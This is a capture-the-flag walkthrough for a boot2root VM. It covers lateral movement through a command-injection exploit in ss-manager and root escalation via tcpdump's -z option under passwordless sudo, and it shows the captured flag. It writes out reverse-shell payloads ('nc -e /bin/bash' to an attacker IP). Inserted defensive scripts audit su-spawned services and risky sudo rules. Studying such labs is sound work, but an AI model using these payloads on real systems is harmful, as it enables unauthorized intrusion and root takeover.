Enumeration

After getting back our reverse shell from the exploited web app, we need to start enumeration. A couple of things jumped out at me as important: there’s another user on this box aside from nodeadmin (the user we got back from the web app), and root appears to have started a network process that’s running as this other user. I didn’t know what ss-manager was, but after some casual googling, we find out that it’s a program for managing shadowsocks, a proxy server. More importantly, there’s an exploit where ss-manager will execute code if it’s delivered over the UDP port that the process listens on at 127.0.0.1. Details here: https://www.exploit-db.com/exploits/43006/.

[nodeadmin@localhost ~]$ cd /home/
cd /home/
[nodeadmin@localhost home]$ ls
ls
fireman  nodeadmin
[nodeadmin@localhost home]$ ps aux | grep fireman
ps aux | grep fireman
root       834  0.0  0.1 301464  4520 ?        S    15:25   0:00 su fireman -c /usr/local/bin/ss-manager
fireman    848  0.0  0.0  37060  3888 ?        Ss   15:25   0:00 /usr/local/bin/ss-manager
nodeadm+   931  0.0  0.0 213788  1008 pts/0    S+   15:25   0:00 grep --color=auto fireman
[nodeadmin@localhost home]$
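The enumeration step above (a root-owned `su fireman -c ...` wrapper, a child running as fireman, and a UDP service bound on loopback) is the kind of thing worth checking for systematically, because a daemon that root hands off to a lower-privileged account is still reachable by every local user when it listens on 127.0.0.1. The script below is an added example, not the author's or the box's tooling: it cross-references `ps` and `ss -lunp` output to list every child of a root `su <user> -c` wrapper together with the sockets it listens on. Both inputs are constructed samples; the port 8839 and the file descriptor in the `ss` sample are assumptions.

```shell
#!/bin/sh
# Added example (not the author's tooling): flag services that root launched as
# another account via "su <user> -c ..." and show what each one listens on.

# Constructed sample of `ps -eo pid,ppid,user,args` (mirrors the ps output above).
SAMPLE_PS='  PID  PPID USER      COMMAND
    1     0 root      /sbin/init
  834     1 root      su fireman -c /usr/local/bin/ss-manager
  848   834 fireman   /usr/local/bin/ss-manager
  900     1 root      /usr/sbin/sshd -D
  931   920 nodeadmin grep --color=auto fireman'

# Constructed sample of `ss -lunp` (UDP listeners); port 8839 and fd=4 are assumptions.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
UNCONN 0      0      127.0.0.1:8839     0.0.0.0:*    users:(("ss-manager",pid=848,fd=4))
UNCONN 0      0      0.0.0.0:68         0.0.0.0:*    users:(("dhclient",pid=700,fd=6))'

# su_spawned PS_TEXT SS_TEXT
# Prints one line per child of a root "su <user> -c" wrapper:
#   <user> <pid> <command> listens=<addr:port[,addr:port]|none>
su_spawned() {
  ps_text=$1
  ss_text=$2
  printf '%s\n' "$ps_text" | awk '
    NR == 1 { next }                                   # skip the header row
    $3 == "root" && $4 == "su" && $6 == "-c" { wrapper[$1] = 1; next }
    ($2 in wrapper) {                                  # child of a su wrapper
      cmd = $4
      for (i = 5; i <= NF; i++) cmd = cmd " " $i       # keep the full command line
      print $3, $1, cmd                                # user pid command
    }
  ' | while read -r user pid cmd; do
    # Collect every local address:port whose owning process has this pid.
    listen=$(printf '%s\n' "$ss_text" | awk -v p="pid=$pid," '
      index($0, p) { a = a (a != "" ? "," : "") $4 }
      END { print a }')
    [ -n "$listen" ] || listen=none
    printf '%s %s %s listens=%s\n' "$user" "$pid" "$cmd" "$listen"
  done
}

su_spawned "$SAMPLE_PS" "$SAMPLE_SS"
```

On a live host, feed it `"$(ps -eo pid,ppid,user,args)"` and `"$(ss -lunp)"` instead of the samples; add `ss -ltnp` as a second pass if TCP listeners matter too. Anything it reports that binds loopback without authentication is local attack surface, regardless of which account the service runs as.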

Based on the info about the exploit, we set up another listener and then invoke the following command:

[nodeadmin@localhost home]$ echo 'add : { "server_port" : 8003, "password" : "test", "method" : "|| nc -e /bin/bash 192.168.219.4 4444 ||" }' | nc -u 127.0.0.1 8839
[nodeadmin@localhost home]$
duder@duder-VirtualBox:~$ sudo nc -nlvp 4444
[sudo] password for duder:
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.219.3] port 4444 [tcp/*] accepted (family 2, sport 47334)
python -c 'import pty; pty.spawn("/bin/bash")'
[fireman@localhost root]$

Ok, so we haven’t gotten root, but as expected, we’ve at least been able to jump to another user account. Hopefully this one gives us a few more options than nodeadmin. I restart the enumeration process, and notice what could be a method of breaking out to root. Trying sudo -l gives us the following:

[fireman@localhost root]$ sudo -l
Matching Defaults entries for fireman on localhost:
    !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
    LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
    LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fireman may run the following commands on localhost:
    (ALL) NOPASSWD: /sbin/iptables
    (ALL) NOPASSWD: /usr/bin/nmcli
    (ALL) NOPASSWD: /usr/sbin/tcpdump
[fireman@localhost root]$

What should immediately draw our attention is that we have access to run three commands as root without providing a password. I went looking for break-out methods regarding the first two and couldn’t find anything. I consulted the man pages for tcpdump and noticed the following:

-z postrotate-command
    Used in conjunction with the -C or -G options, this will make tcpdump run " postrotate-command file " where file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2. 
    Note that tcpdump will run the command in parallel to the capture, using the lowest priority so that this doesn't disturb the capture process. 
    And in case you would like to use a command that itself takes flags or different arguments, you can always write a shell script that will take the savefile name as the only argument, make the flags & arguments arrangements and execute the command that you want. 

This looks pretty promising. After some trial and error reading the man pages and experimenting with various commands, I was finally able to get a reverse shell. Just to briefly go over the options: -z invokes my script, which just invokes nc back to another listener I’ve set up, -G 1 rotates to a new file after one byte, -c 1 stops after getting one byte and -Z “drops” permissions to root to ensure we actually execute the post rotate command with elevated permissions.
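The point to take away from the `sudo -l` output is that a passwordless rule on a binary with a "run this command" option (tcpdump's `-z postrotate-command` here) is equivalent to a passwordless root shell, however harmless the binary looks. sudoers treats any arguments written into a rule as an exact-match requirement, so pinning tcpdump's arguments in the rule leaves no room for `-z`; dropping NOPASSWD or wrapping the capture in a script that takes no user input is cleaner still. The script below is an added example, not the author's or the box's tooling: it audits `sudo -l` output and grades each rule. The sample input is constructed to mirror the three entries above plus one hardened rule with fixed arguments, and the list of command-spawning binaries is a deliberately short, hypothetical starting point.

```shell
#!/bin/sh
# Added example (not the author's tooling): grade `sudo -l` rules by whether the
# target binary can spawn other programs and whether its arguments are pinned.

# Binaries that can run an arbitrary command when given the right flag
# (tcpdump -z, find -exec, vim :!, less !, awk system()). Hypothetical short
# list; extend it for your environment.
SPAWNERS='tcpdump find vim vi less more awk python perl bash sh env'

# Constructed `sudo -l` sample: the page's three entries plus a hardened rule
# whose arguments are fixed in sudoers (exact match required at run time).
SAMPLE_SUDO_L='Matching Defaults entries for fireman on localhost:
    !visiblepw, env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fireman may run the following commands on localhost:
    (ALL) NOPASSWD: /sbin/iptables
    (ALL) NOPASSWD: /usr/bin/nmcli
    (ALL) NOPASSWD: /usr/sbin/tcpdump
    (root) /usr/sbin/tcpdump -i eth0 -w /var/log/capture.pcap'

# audit_sudo_rules: read `sudo -l` output on stdin and print one line per rule:
#   <severity> <binary> <reason>
audit_sudo_rules() {
  awk -v spawners="$SPAWNERS" '
    BEGIN { n = split(spawners, s, " "); for (i = 1; i <= n; i++) spawn[s[i]] = 1 }
    # Rule lines are the ones that start with a "(runas)" specification.
    /^[ \t]*\(/ {
      line = $0
      sub(/^[ \t]*\([^)]*\)[ \t]*/, "", line)          # drop "(ALL)" / "(root)"
      nopass = 0
      if (line ~ /^NOPASSWD:/) { nopass = 1; sub(/^NOPASSWD:[ \t]*/, "", line) }
      nargs = split(line, f, " ")
      path = f[1]
      base = path; sub(/.*\//, "", base)               # basename of the binary
      has_args = (nargs > 1)
      if (spawn[base] && !has_args) {
        sev = nopass ? "CRITICAL" : "HIGH"
        print sev, path, "can execute commands and arguments are unrestricted"
      } else if (nopass && !has_args) {
        print "MEDIUM", path, "NOPASSWD with unrestricted arguments"
      } else {
        print "INFO", path, "arguments fixed in sudoers"
      }
    }'
}

# critical_count SUDO_L_TEXT: number of CRITICAL findings, handy as a cron check.
critical_count() {
  printf '%s\n' "$1" | audit_sudo_rules | grep -c '^CRITICAL'
}

printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_rules
```

Run it as `sudo -l | audit_sudo_rules` for the current account, or loop over accounts with `sudo -l -U <user>` from an administrative host. The MEDIUM findings still deserve a look: iptables and nmcli do not spawn shells, but passwordless root access to the firewall and network configuration is its own risk.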

[fireman@localhost ~]$ echo '#!/bin/bash' >> test.sh
[fireman@localhost ~]$ echo 'nc -e /bin/bash 192.168.219.4 5555' >> test.sh
[fireman@localhost ~]$ chmod 777 test.sh
[fireman@localhost ~]$ sudo tcpdump -z /home/fireman/test.sh -w /tmp/pack.pcap -G 1 -c 1 -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
1 packet captured
7 packets received by filter
0 packets dropped by kernel
[fireman@localhost ~]$
duder@duder-VirtualBox:~$ sudo nc -nlvp 5555
[sudo] password for duder:
Listening on [0.0.0.0] (family 0, port 5555)
Connection from [192.168.219.3] port 5555 [tcp/*] accepted (family 2, sport 36470)
python -c 'import pty; pty.spawn("/bin/bash")'
[root@localhost fireman]# cd /root
cd /root
[root@localhost ~]# cat flag.txt
cat flag.txt
[+] You're a soldier.
[+] One of the best that the world could set against
[+] the demonic invasion.

+-----------------------------------------------------------------------------+
| |       |\                                           -~ /     \  /          |
|~~__     | \                                         | \/       /\          /|
|    --   |  \                                        | / \    /    \     /   |
|      |~_|   \                                   \___|/    \/         /      |
|--__  |   -- |\________________________________/~~\~~|    /  \     /     \   |
|   |~~--__  |~_|____|____|____|____|____|____|/ /  \/|\ /      \/          \/|
|   |      |~--_|__|____|____|____|____|____|_/ /|    |/ \    /   \       /   |
|___|______|__|_||____|____|____|____|____|__[]/_|----|    \/       \  /      |
|  \mmmm :   | _|___|____|____|____|____|____|___|  /\|   /  \      /  \      |
|      B :_--~~ |_|____|____|____|____|____|____|  |  |\/      \ /        \   |
|  __--P :  |  /                                /  /  | \     /  \          /\|
|~~  |   :  | /                                 ~~~   |  \  /      \      /   |
|    |      |/                        .-.             |  /\          \  /     |
|    |      /                        |   |            |/   \          /\      |
|    |     /                        |     |            -_   \       /    \    |
+-----------------------------------------------------------------------------+
|          |  /|  |   |  2  3  4  | /~~~~~\ |       /|    |_| ....  ......... |
|          |  ~|~ | % |           | | ~J~ | |       ~|~ % |_| ....  ......... |
|   AMMO   |  HEALTH  |  5  6  7  |  \===/  |    ARMOR    |#| ....  ......... |
+-----------------------------------------------------------------------------+

                FLAG: kre0cu4jl4rzjicpo1i7z5l1

[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.

[+] You can follow me on twitter: @0katz

[+] Thanks to the homie: @Pink_P4nther
[root@localhost ~]#